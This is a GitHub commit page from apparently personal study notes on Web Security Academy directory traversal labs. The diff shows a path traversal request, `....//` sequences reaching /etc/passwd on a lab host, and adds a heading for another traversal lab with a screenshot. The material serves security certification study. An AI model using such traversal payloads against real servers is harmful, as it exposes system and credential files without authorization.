Skip to content

Commit

Permalink
feat(bscp): add directory travesal labs
Browse files Browse the repository at this point in the history
  • Loading branch information
Sirius-A committed Nov 7, 2023
1 parent ed161ff commit b8a6be2
Show file tree
Hide file tree
Showing 2 changed files with 4 additions and 0 deletions.
Original file line number Diff line number Diff line change
Expand Up @@ -10,3 +10,7 @@ GET /image?filename=....//....//....//....//etc/passwd HTTP/2
Host: 0afc0083049fe2ff877f7f5400b400a1.web-security-academy.net
```


## File path traversal, traversal sequences stripped with superfluous URL-decode

![path traversal brute](./images/path-traversal-brute.png)
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.

0 comments on commit b8a6be2

Please sign in to comment.